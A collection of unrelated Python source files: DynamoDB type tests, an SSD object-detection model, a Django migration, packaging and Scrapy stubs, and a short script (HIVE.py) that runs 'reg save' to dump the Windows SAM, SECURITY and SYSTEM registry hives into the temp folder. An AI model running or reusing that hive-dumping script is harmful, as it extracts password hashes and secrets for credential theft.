612325535126eaddebc230d8c27af095c8e5cc2f
|
/depot_tools/external_bin/gsutil/gsutil_4.15/gsutil/third_party/boto/tests/unit/dynamodb/test_types.py
|
e3b913d7eb4a7e8789aa9a1becd8cefa58b17d6a
|
[
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
TrellixVulnTeam/proto-quic_1V94
|
1a3a03ac7a08a494b3d4e9857b24bb8f2c2cd673
|
feee14d96ee95313f236e0f0e3ff7719246c84f7
|
refs/heads/master
| 2023-04-01T14:36:53.888576 | 2019-10-17T02:23:04 | 2019-10-17T02:23:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,427 |
py
|
#!/usr/bin/env python
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from decimal import Decimal
from tests.compat import unittest
from boto.compat import six
from boto.dynamodb import types
from boto.dynamodb.exceptions import DynamoDBNumberError
class TestDynamizer(unittest.TestCase):
    """Encode/decode round-trips for boto's DynamoDB dynamizers."""

    def setUp(self):
        pass

    def test_encoding_to_dynamodb(self):
        dyn = types.Dynamizer()
        self.assertEqual(dyn.encode('foo'), {'S': 'foo'})
        self.assertEqual(dyn.encode(54), {'N': '54'})
        self.assertEqual(dyn.encode(Decimal('1.1')), {'N': '1.1'})
        self.assertEqual(dyn.encode(set([1, 2, 3])), {'NS': ['1', '2', '3']})
        # A string set may serialize its members in either order.
        self.assertIn(dyn.encode(set(['foo', 'bar'])),
                      ({'SS': ['foo', 'bar']}, {'SS': ['bar', 'foo']}))
        self.assertEqual(dyn.encode(types.Binary(b'\x01')), {'B': 'AQ=='})
        self.assertEqual(dyn.encode(set([types.Binary(b'\x01')])),
                         {'BS': ['AQ==']})
        self.assertEqual(
            dyn.encode(['foo', 54, [1]]),
            {'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]})
        self.assertEqual(
            dyn.encode({'foo': 'bar', 'hoge': {'sub': 1}}),
            {'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}})
        self.assertEqual(dyn.encode(None), {'NULL': True})
        self.assertEqual(dyn.encode(False), {'BOOL': False})

    def test_decoding_to_dynamodb(self):
        dyn = types.Dynamizer()
        self.assertEqual(dyn.decode({'S': 'foo'}), 'foo')
        self.assertEqual(dyn.decode({'N': '54'}), 54)
        self.assertEqual(dyn.decode({'N': '1.1'}), Decimal('1.1'))
        self.assertEqual(dyn.decode({'NS': ['1', '2', '3']}), set([1, 2, 3]))
        self.assertEqual(dyn.decode({'SS': ['foo', 'bar']}),
                         set(['foo', 'bar']))
        self.assertEqual(dyn.decode({'B': 'AQ=='}), types.Binary(b'\x01'))
        self.assertEqual(dyn.decode({'BS': ['AQ==']}),
                         set([types.Binary(b'\x01')]))
        self.assertEqual(
            dyn.decode({'L': [{'S': 'foo'}, {'N': '54'},
                              {'L': [{'N': '1'}]}]}),
            ['foo', 54, [1]])
        self.assertEqual(
            dyn.decode({'M': {'foo': {'S': 'bar'},
                              'hoge': {'M': {'sub': {'N': '1'}}}}}),
            {'foo': 'bar', 'hoge': {'sub': 1}})
        self.assertEqual(dyn.decode({'NULL': True}), None)
        self.assertEqual(dyn.decode({'BOOL': False}), False)

    def test_float_conversion_errors(self):
        dyn = types.Dynamizer()
        # Exactly-representable floats encode fine via Decimal...
        self.assertEqual(dyn.encode(1.25), {'N': '1.25'})
        # ...inexact ones raise, which is why Decimal is preferred.
        with self.assertRaises(DynamoDBNumberError):
            dyn.encode(1.1)

    def test_non_boolean_conversions(self):
        # The legacy dynamizer stores booleans as numbers.
        self.assertEqual(types.NonBooleanDynamizer().encode(True), {'N': '1'})

    def test_lossy_float_conversions(self):
        dyn = types.LossyFloatDynamizer()
        # Only the float-specific behaviour differs from Dynamizer.
        self.assertEqual(dyn.encode(1.1), {'N': '1.1'})
        self.assertEqual(dyn.decode({'N': '1.1'}), 1.1)
        self.assertEqual(dyn.encode(set([1.1])), {'NS': ['1.1']})
        self.assertEqual(dyn.decode({'NS': ['1.1', '2.2', '3.3']}),
                         set([1.1, 2.2, 3.3]))
class TestBinary(unittest.TestCase):
    """Behaviour of the Binary wrapper across Python 2 and 3."""

    def test_good_input(self):
        wrapped = types.Binary(b'\x01')
        self.assertEqual(b'\x01', wrapped)
        self.assertEqual(b'\x01', bytes(wrapped))

    def test_non_ascii_good_input(self):
        # Payload bytes outside the ASCII range must round-trip too.
        wrapped = types.Binary(b'\x88')
        self.assertEqual(b'\x88', wrapped)
        self.assertEqual(b'\x88', bytes(wrapped))

    @unittest.skipUnless(six.PY2, "Python 2 only")
    def test_bad_input(self):
        with self.assertRaises(TypeError):
            types.Binary(1)

    @unittest.skipUnless(six.PY3, "Python 3 only")
    def test_bytes_input(self):
        # On Python 3, bytes(1) yields a single zero byte.
        wrapped = types.Binary(1)
        self.assertEqual(wrapped, b'\x00')
        self.assertEqual(wrapped.value, b'\x00')

    @unittest.skipUnless(six.PY2, "Python 2 only")
    def test_unicode_py2(self):
        # It's dirty. But remains for backward compatibility.
        wrapped = types.Binary(u'\x01')
        self.assertEqual(wrapped, b'\x01')
        self.assertEqual(bytes(wrapped), b'\x01')
        # Delegates to the built-in comparison; on Python 2 a bytestring
        # and the equivalent unicode string compare equal.
        self.assertEqual(wrapped, u'\x01')
        # The stored value must be of type bytes.
        self.assertEqual(type(wrapped.value), bytes)

    @unittest.skipUnless(six.PY3, "Python 3 only")
    def test_unicode_py3(self):
        with self.assertRaises(TypeError):
            types.Binary(u'\x01')
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
[
"[email protected]"
] | |
a56ba42731fa60638172e5e3a581d2f14f7d8df7
|
6b4fbd5104f9f48590b409fbe76fee059823a51c
|
/models/drf_res.py
|
152e9c9f281a7d8e2fe81315ce95c3f612737863
|
[
"MIT"
] |
permissive
|
sebastiani/SSD_Pytorch
|
655f59a51a7c1ef20493f0b9284ecd4eeae490cd
|
98be17f15a863f25adfe70c86938db82ff2a8786
|
refs/heads/master
| 2020-04-07T01:05:57.114451 | 2018-10-18T01:16:56 | 2018-10-18T01:16:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,573 |
py
|
# -*- coding: utf-8 -*-
# Written by yq_yao
import torch
import torch.nn as nn
import torch.nn.functional as F
import models.dense_conv
from torch.autograd import Variable
from utils.box_utils import weights_init
def add_extras(size, in_channel, batch_norm=False):
    """Build the extra SSD feature layers appended after the backbone.

    Returns a flat list of nn.Conv2d modules; `size` ('300' vs anything
    else, e.g. '512') selects how many down-sampling stages follow the
    shared head. `batch_norm` is accepted for interface compatibility
    but is not used here.
    """
    layers = [
        nn.Conv2d(in_channel, 256, kernel_size=1, stride=1),
        nn.Conv2d(256, 256, kernel_size=3, stride=2, padding=1),
        nn.Conv2d(256, 128, kernel_size=1, stride=1),
        nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1),
    ]
    if size == '300':
        # One extra 3x3 stage without padding (spatial 3x3 -> 1x1).
        layers.append(nn.Conv2d(256, 128, kernel_size=1, stride=1))
        layers.append(nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=0))
    else:
        # Two extra strided stages for the larger input resolution.
        for _ in range(2):
            layers.append(nn.Conv2d(256, 128, kernel_size=1, stride=1))
            layers.append(nn.Conv2d(128, 256, kernel_size=3, stride=2,
                                    padding=1))
    return layers
class Bottleneck(nn.Module):
    """ResNet bottleneck: 1x1 reduce -> 3x3 (optionally strided) -> 1x1
    expand by `expansion`, with a projection shortcut when the shape
    changes."""
    expansion = 4

    def __init__(self, in_planes, planes, stride=1):
        super(Bottleneck, self).__init__()
        out_planes = self.expansion * planes
        self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,
                               stride=stride, padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = nn.Conv2d(planes, out_planes, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(out_planes)
        # Identity shortcut unless spatial size or channel count changes,
        # in which case a strided 1x1 projection matches the shapes.
        if stride != 1 or in_planes != out_planes:
            self.downsample = nn.Sequential(
                nn.Conv2d(in_planes, out_planes,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(out_planes),
            )
        else:
            self.downsample = nn.Sequential()

    def forward(self, x):
        shortcut = self.downsample(x)
        out = F.relu(self.bn1(self.conv1(x)))
        out = F.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        out = F.relu(out + shortcut)
        return out
class DenseSSDResnet(nn.Module):
    """ResNet backbone with densely cross-connected multi-scale SSD heads.

    forward() returns a list of feature maps (`sources`): the first four
    are concatenations of up-/down-sampled features from several backbone
    stages (the "dense" connections), the remainder come straight from the
    extra SSD layers.

    NOTE(review): the up/down-sampling modules come from the project-local
    ``models.dense_conv.dense_list_res``; the channel/stride layout of the
    six returned lists is assumed from the indexing in forward() — confirm
    against that module.
    """
    def __init__(self, block, num_blocks, size='300', channel_size='48'):
        super(DenseSSDResnet, self).__init__()
        self.in_planes = 64
        # Standard ResNet stem: 7x7 stride-2 conv + BN (max-pool in forward).
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7,
                               stride=2, padding=3, bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        # Bottom-up layers
        self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
        self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
        self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
        self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
        # Extra SSD layers appended after the backbone (2048 = layer4 out).
        self.extras = nn.ModuleList(add_extras(str(size), 2048))
        # Six groups of dense-connection conv/resize modules (project-local).
        dense_list = models.dense_conv.dense_list_res(channel_size, size)
        self.dense_list0 = nn.ModuleList(dense_list[0])
        self.dense_list1 = nn.ModuleList(dense_list[1])
        self.dense_list2 = nn.ModuleList(dense_list[2])
        self.dense_list3 = nn.ModuleList(dense_list[3])
        self.dense_list4 = nn.ModuleList(dense_list[4])
        self.dense_list5 = nn.ModuleList(dense_list[5])
        # Reduces layer4's 2048 channels before joining a concatenation.
        self.smooth1 = nn.Conv2d(2048, 512, kernel_size=3, stride=1, padding=1)
        self._init_modules()
    def _make_layer(self, block, planes, num_blocks, stride):
        # First block may stride; the rest keep stride 1 (ResNet layout).
        strides = [stride] + [1]*(num_blocks-1)
        layers = []
        for stride in strides:
            layers.append(block(self.in_planes, planes, stride))
            self.in_planes = planes * block.expansion
        return nn.Sequential(*layers)
    def _init_modules(self):
        # Weight init for everything except the (pretrainable) backbone.
        self.extras.apply(weights_init)
        self.dense_list0.apply(weights_init)
        self.dense_list1.apply(weights_init)
        self.dense_list2.apply(weights_init)
        self.dense_list3.apply(weights_init)
        self.dense_list4.apply(weights_init)
        self.dense_list5.apply(weights_init)
        self.smooth1.apply(weights_init)
    def forward(self, x):
        # Bottom-up
        c1 = F.relu(self.bn1(self.conv1(x)))
        c1 = F.max_pool2d(c1, kernel_size=3, stride=2, padding=1)
        c2 = self.layer1(c1)
        # Downsample c2 three times; keep a conv of each scale for later
        # concatenation with the deeper stages.
        dense1_p1 = self.dense_list0[0](c2)
        dense1_p2 = self.dense_list0[1](dense1_p1)
        dense1_p3 = self.dense_list0[2](dense1_p2)
        dense1_p1_conv = self.dense_list0[3](dense1_p1)
        dense1_p2_conv = self.dense_list0[4](dense1_p2)
        dense1_p3_conv = self.dense_list0[5](dense1_p3)
        c3 = self.layer2(c2)
        dense2_p1 = self.dense_list1[0](c3)
        dense2_p2 = self.dense_list1[1](dense2_p1)
        dense2_p3 = self.dense_list1[2](dense2_p2)
        dense2_p1_conv = self.dense_list1[3](dense2_p1)
        dense2_p2_conv = self.dense_list1[4](dense2_p2)
        dense2_p3_conv = self.dense_list1[5](dense2_p3)
        c4 = self.layer3(c3)
        # c4 contributes one upsampled path and two downsampled paths.
        dense3_up_conv = self.dense_list2[0](c4)
        dense3_up = self.dense_list2[1](dense3_up_conv)
        dense3_p1 = self.dense_list2[2](c4)
        dense3_p2 = self.dense_list2[3](dense3_p1)
        dense3_p1_conv = self.dense_list2[4](dense3_p1)
        dense3_p2_conv = self.dense_list2[5](dense3_p2)
        c5 = self.layer4(c4)
        c5_ = self.smooth1(c5)
        # c5 contributes two upsampled paths and one downsampled path.
        dense4_up1_conv = self.dense_list3[0](c5)
        dense4_up2_conv = self.dense_list3[1](c5)
        dense4_up1 = self.dense_list3[2](dense4_up1_conv)
        dense4_up2 = self.dense_list3[3](dense4_up2_conv)
        dense4_p = self.dense_list3[4](c5)
        dense4_p_conv = self.dense_list3[5](dense4_p)
        # First two extra layers produce p6; the rest run in the loop below.
        p6 = F.relu(self.extras[0](c5), inplace=True)
        p6 = F.relu(self.extras[1](p6), inplace=True)
        x = p6
        dense5_up1_conv = self.dense_list4[0](p6)
        dense5_up2_conv = self.dense_list4[1](p6)
        dense5_up3_conv = self.dense_list4[2](p6)
        dense5_up1 = self.dense_list4[3](dense5_up1_conv)
        dense5_up2 = self.dense_list4[4](dense5_up2_conv)
        dense5_up3 = self.dense_list4[5](dense5_up3_conv)
        # Each output scale concatenates one backbone stage with resized
        # features from the other stages, then fuses with a 1x1-style conv.
        dense_out1 = torch.cat(
            (dense1_p1_conv, c3, dense3_up, dense4_up2, dense5_up3), 1)
        dense_out1 = F.relu(self.dense_list5[0](dense_out1))
        dense_out2 = torch.cat(
            (dense1_p2_conv, dense2_p1_conv, c4, dense4_up1, dense5_up2), 1)
        dense_out2 = F.relu(self.dense_list5[1](dense_out2))
        dense_out3 = torch.cat(
            (dense1_p3_conv, dense2_p2_conv, dense3_p1_conv, c5_, dense5_up1), 1)
        dense_out3 = F.relu(self.dense_list5[2](dense_out3))
        dense_out4 = torch.cat(
            (dense2_p3_conv, dense3_p2_conv, dense4_p_conv, p6), 1)
        dense_out4 = F.relu(self.dense_list5[3](dense_out4))
        sources = [dense_out1, dense_out2, dense_out3, dense_out4]
        # apply extra layers and cache source layer outputs
        for k, v in enumerate(self.extras):
            if k > 1:
                x = F.relu(v(x), inplace=True)
                if k % 2 == 1:
                    sources.append(x)
        return sources
def DRFSSDRes50(size, channel_size='48'):
    """DRF-SSD on a ResNet-50 backbone (bottleneck counts 3-4-6-3)."""
    resnet50_blocks = [3, 4, 6, 3]
    return DenseSSDResnet(Bottleneck, resnet50_blocks, size, channel_size)
def DRFSSDRes101(size, channel_size='48'):
    """DRF-SSD on a ResNet-101 backbone (bottleneck counts 3-4-23-3)."""
    resnet101_blocks = [3, 4, 23, 3]
    return DenseSSDResnet(Bottleneck, resnet101_blocks, size, channel_size)
def DRFSSDRes152(size, channel_size='48'):
    """DRF-SSD on a ResNet-152 backbone (bottleneck counts 3-8-36-3)."""
    resnet152_blocks = [3, 8, 36, 3]
    return DenseSSDResnet(Bottleneck, resnet152_blocks, size, channel_size)
|
[
"[email protected]"
] | |
81b968c9d9e14ff5772ae28bead91e71f66173d8
|
50e2012ecea8307e278d1132ca0094adb940aff2
|
/lib/review/my_process/my_multiprocessing.py
|
a299b8a3185df0bb568f1c9bc93484f95d15cfcb
|
[] |
no_license
|
Lewescaiyong/my_library
|
6689cae2db4aaa980b4bd5ed9f21691eefbff2fe
|
35d0d29097823ccef74fa29ca8756a7f59ceeb78
|
refs/heads/master
| 2020-11-25T09:20:56.484275 | 2019-12-17T10:58:20 | 2019-12-17T10:58:20 | 228,593,219 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Demo of the identical map() API on a process pool and a thread pool."""
import multiprocessing
from multiprocessing.dummy import Pool


def square(x):
    """Worker used to exercise Pool.map; top-level so it is picklable."""
    return x * x


if __name__ == '__main__':
    # Fixes: the original called pool.map() with no arguments, which raises
    # TypeError (map needs a function and an iterable), and it created and
    # leaked both pools at import time. The demo now runs only when executed
    # as a script, and the context managers terminate the workers.
    with multiprocessing.Pool() as process_pool:
        print(process_pool.map(square, range(5)))
    with Pool() as thread_pool:  # multiprocessing.dummy: thread-backed Pool
        print(thread_pool.map(square, range(5)))
|
[
"[email protected]"
] | |
50845d3ddab1ec682e0f345e3c75c1ba47438990
|
ed872a0efb1db283f48176474e22f4c4ad31db79
|
/src/accounts/migrations/0019_fix_socail_auth.py
|
ceffd3defcff51b96d673f95e0fffd2933671048
|
[] |
no_license
|
barontxu/djbookru
|
34c2bf90e5d3542e4cbd2f3e600e1c0a12795d35
|
388bff0491e961f8efdf3cabd6c47d9fa2988547
|
refs/heads/master
| 2021-01-16T20:39:33.949315 | 2014-06-20T12:22:56 | 2014-06-20T12:22:56 | 23,031,683 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,111 |
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
depends_on = (
('social_auth', '0002_auto__add_unique_nonce_timestamp_salt_server_url__add_unique_associati'),
)
    def forwards(self, orm):
        """Delete every social-auth record whose provider is 'google'.

        Data migration: drops the existing google entries so they can be
        re-created by the replacement auth backend. Destructive and not
        reversible — backwards() intentionally restores nothing.
        """
        orm['social_auth.UserSocialAuth'].objects.filter(provider='google').delete()
    def backwards(self, orm):
        """No-op: the rows deleted by forwards() cannot be restored."""
models = {
'accounts.achievement': {
'Meta': {'object_name': 'Achievement'},
'active_icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inactive_icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'accounts.announcement': {
'Meta': {'object_name': 'Announcement'},
'content': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'accounts.emailconfirmation': {
'Meta': {'object_name': 'EmailConfirmation'},
'confirmation_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sent': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.User']"})
},
'accounts.user': {
'Meta': {'object_name': 'User', '_ormbases': ['auth.User']},
'achievements': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['accounts.Achievement']", 'through': "orm['accounts.UserAchievement']", 'symmetrical': 'False'}),
'biography': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'homepage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_valid_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_comments_read': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_doc_comments_read': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'lng': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'signature': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'blank': 'True'}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
},
'accounts.userachievement': {
'Meta': {'unique_together': "(('user', 'achievement'),)", 'object_name': 'UserAchievement'},
'achievement': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Achievement']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'note': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.User']"})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'social_auth.association': {
'Meta': {'unique_together': "(('server_url', 'handle'),)", 'object_name': 'Association'},
'assoc_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'handle': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'lifetime': ('django.db.models.fields.IntegerField', [], {}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'social_auth.nonce': {
'Meta': {'unique_together': "(('server_url', 'timestamp', 'salt'),)", 'object_name': 'Nonce'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'salt': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'social_auth.usersocialauth': {
'Meta': {'unique_together': "(('provider', 'uid'),)", 'object_name': 'UserSocialAuth'},
'extra_data': ('social_auth.fields.JSONField', [], {'default': "'{}'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'social_auth'", 'to': "orm['accounts.User']"})
}
}
complete_apps = ['social_auth', 'accounts']
symmetrical = True
|
[
"[email protected]"
] | |
ea05163688d0e2df0f55b6c2fb8a853cba607e6a
|
382882c162554152702876f1232a08e5c4a66bc0
|
/HIVE.py
|
42294b8e9f3f1d4f32e0d64f6f9c25578a5a1f12
|
[] |
no_license
|
inseok1121/USBLeak
|
582094058fb3c16031fdcedd43b7cc420dec9846
|
5f1cadec4dfea058cfad1965d27cbdaf24099a18
|
refs/heads/master
| 2021-01-24T02:11:37.285286 | 2018-02-25T13:39:56 | 2018-02-25T13:39:56 | 122,839,333 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 614 |
py
|
import os
import tempfile
def save_hivefile():
    """Dump the system, software, sam and security registry hives.

    Each hive is saved into the OS temp directory via ``reg save``
    (Windows-only; os.system fails harmlessly elsewhere).
    """
    temp_dir = tempfile.gettempdir()
    for hive in ('system', 'software', 'sam', 'security'):
        os.system(createCommand(temp_dir, hive))
def createCommand(temp, target):
    """Build the ``reg save`` command line for dumping one registry hive.

    Produces: ``reg save hklm\\<target> <temp>\\<target> /y``
    (save hive ``target`` from HKLM into directory ``temp``, overwriting).

    Replaces the previous eight-statement string concatenation with a
    single format string; the output is byte-identical.
    """
    return "reg save hklm\\{0} {1}\\{0} /y".format(target, temp)
|
[
"[email protected]"
] | |
684522cf9c5924d3b28f46f0200a3bcde4a9de5a
|
ec8d7c3176187359c7618bd591724ea93a9b0772
|
/python/projects/bitwise/setup.py
|
181ad28d54774b70681f809e43e5b3987c3f4554
|
[] |
no_license
|
almacro/snippets
|
7000faf593ab97a0890ea56d944ceef4ef23643a
|
e247c5bc26f336add1c7be8636775f841a65615d
|
refs/heads/master
| 2023-08-05T11:00:13.161159 | 2023-07-23T15:31:42 | 2023-07-23T15:31:42 | 65,136,325 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 229 |
py
|
from setuptools import setup, find_packages

# Packaging metadata for the `bitwise` distribution.
setup(
    name="bitwise",
    version="0.1",
    # Fixed typo: was `install_requiresr`, an unknown keyword that setuptools
    # silently ignores, so the nose dependency was never actually declared.
    install_requires=['nose'],
    packages=find_packages(),
    package_dir={'': 'src'},
    scripts=["scripts/bits", "scripts/bitmask"],
)
|
[
"[email protected]"
] | |
2a727152d5e0b4186b181651149c07394f82f236
|
7e46361bda7d0912e715a4046a91758da0cfca5d
|
/course/migrations/0019_auto_20200520_1051.py
|
75949cbea454c671e756ad7051ce46c87d391e40
|
[] |
no_license
|
varun560/Learning_Portal
|
dee70c64a54dc7ca1cbfa42debc5941289d0984b
|
9cbac1221a33c54be696d174cff470e7399a28d7
|
refs/heads/main
| 2023-01-21T14:29:27.196241 | 2020-11-25T05:59:47 | 2020-11-25T05:59:47 | 315,658,398 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 800 |
py
|
# Generated by Django 3.0.6 on 2020-05-20 05:21
from django.db import migrations, models
from django.utils import timezone
class Migration(migrations.Migration):
    """Replace Assignment.deadline with start_date / end_date fields."""

    dependencies = [
        ('course', '0018_assignment'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='assignment',
            name='deadline',
        ),
        migrations.AddField(
            model_name='assignment',
            name='end_date',
            # NOTE(review): timezone.now() is *called* here, so the default
            # is the timestamp at which this migration module is imported,
            # not the row-creation time; each run of the migration uses a
            # different constant. With preserve_default=False it only
            # backfills existing rows — confirm this is intended.
            field=models.DateTimeField(default=timezone.now()),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='assignment',
            name='start_date',
            # auto_now_add supplies the real value on insert; the called
            # timezone.now() default is only the one-off backfill value
            # for pre-existing rows.
            field=models.DateTimeField(auto_now_add=True, default=timezone.now()),
            preserve_default=False,
        ),
    ]
|
[
"[email protected]"
] | |
573aeb3671f39eb706671112ecd46bc16b3e47ef
|
d1194d9ff416408717470694d913132d6cd5f84b
|
/oneMonthNewsApiExtractor/oneMonther/oneMonther/middlewares.py
|
ff3bb1101f8d18b521928f3ad64c949f3d14c726
|
[] |
no_license
|
bopopescu/pinalpha_mvp
|
c7f5a37e3c2bb7c009c6d0eda9e964346ec6b244
|
928d21cef1b4aa59b7af81d64c592b6f393102f9
|
refs/heads/master
| 2021-10-10T12:54:18.026399 | 2019-01-11T02:54:49 | 2019-01-11T02:54:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,908 |
py
|
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class OnemontherSpiderMiddleware(object):
    """Pass-through spider middleware (Scrapy project-template defaults).

